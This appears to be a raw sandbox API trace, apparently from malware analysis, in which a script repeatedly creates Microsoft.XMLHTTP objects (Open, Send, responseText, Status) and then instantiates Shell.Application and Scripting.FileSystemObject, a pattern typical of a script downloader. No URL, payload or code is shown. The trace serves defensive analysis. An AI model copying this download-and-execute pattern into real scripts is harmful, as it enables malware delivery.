	[0344.603] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c77e8) returned 0x0
	[0344.603] ??2@YAPEAX_K@Z () returned 0x62f310
	[0344.603] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c77e8, pUnkSite=0x62f310) 
	[0344.603] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0344.604] XMLHTTPRequest:IUnknown:Release (This=0x49c77e8) returned 0x0
	[0344.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0344.604] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0344.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0344.604] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0344.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0344.604] longjmp () 
	[0344.604] longjmp () 
	[0344.604] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0344.604] SysStringLen (param_1=0x0) returned 0x0
	[0344.604] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0344.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0344.604] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7780) returned 0x0
	[0344.604] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0344.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0344.604] ??2@YAPEAX_K@Z () returned 0x62f330
	[0344.605] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0344.605] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0344.605] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0344.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7780) returned 0x0
	[0344.605] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7780) returned 0x3
	[0344.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0344.605] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7780, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0344.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0344.605] longjmp () 
	[0344.605] longjmp () 
	[0344.605] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0344.605] SysStringLen (param_1=0x0) returned 0x0
	[0344.605] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0344.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0344.605] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77e0) returned 0x0
	[0344.605] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0344.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7848) returned 0x0
	[0344.605] ??2@YAPEAX_K@Z () returned 0x62f310
	[0344.606] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7848, pUnkSite=0x62f310) 
	[0344.606] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0344.606] XMLHTTPRequest:IUnknown:Release (This=0x49c7848) returned 0x0
	[0344.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77e0) returned 0x0
	[0344.606] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77e0) returned 0x3
	[0344.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0344.606] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0344.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0344.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0344.606] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0344.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0346.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0346.081] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0346.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0346.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0346.082] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0346.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0346.082] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0346.082] SysStringLen (param_1=0x0) returned 0x0
	[0346.082] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0346.082] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0346.082] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0346.083] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0346.083] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0346.083] ??2@YAPEAX_K@Z () returned 0x62f350
	[0346.083] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0346.083] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0346.083] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0346.083] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0346.083] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0346.083] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0346.083] SysStringLen (param_1=0x0) returned 0x0
	[0346.083] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0346.086] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0346.086] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0346.086] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0346.086] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0346.086] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0346.086] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0347.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0347.251] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0347.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0347.252] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0347.252] SysStringLen (param_1=0x0) returned 0x0
	[0347.252] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0347.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0347.252] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77e0) returned 0x0
	[0347.252] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0347.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0347.252] ??2@YAPEAX_K@Z () returned 0x62f310
	[0347.253] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0347.253] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0347.253] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0347.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77e0) returned 0x0
	[0347.253] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77e0) returned 0x3
	[0347.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0347.253] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0347.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.255] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0347.255] SysStringLen (param_1=0x0) returned 0x0
	[0347.255] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0347.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0347.255] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0347.255] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
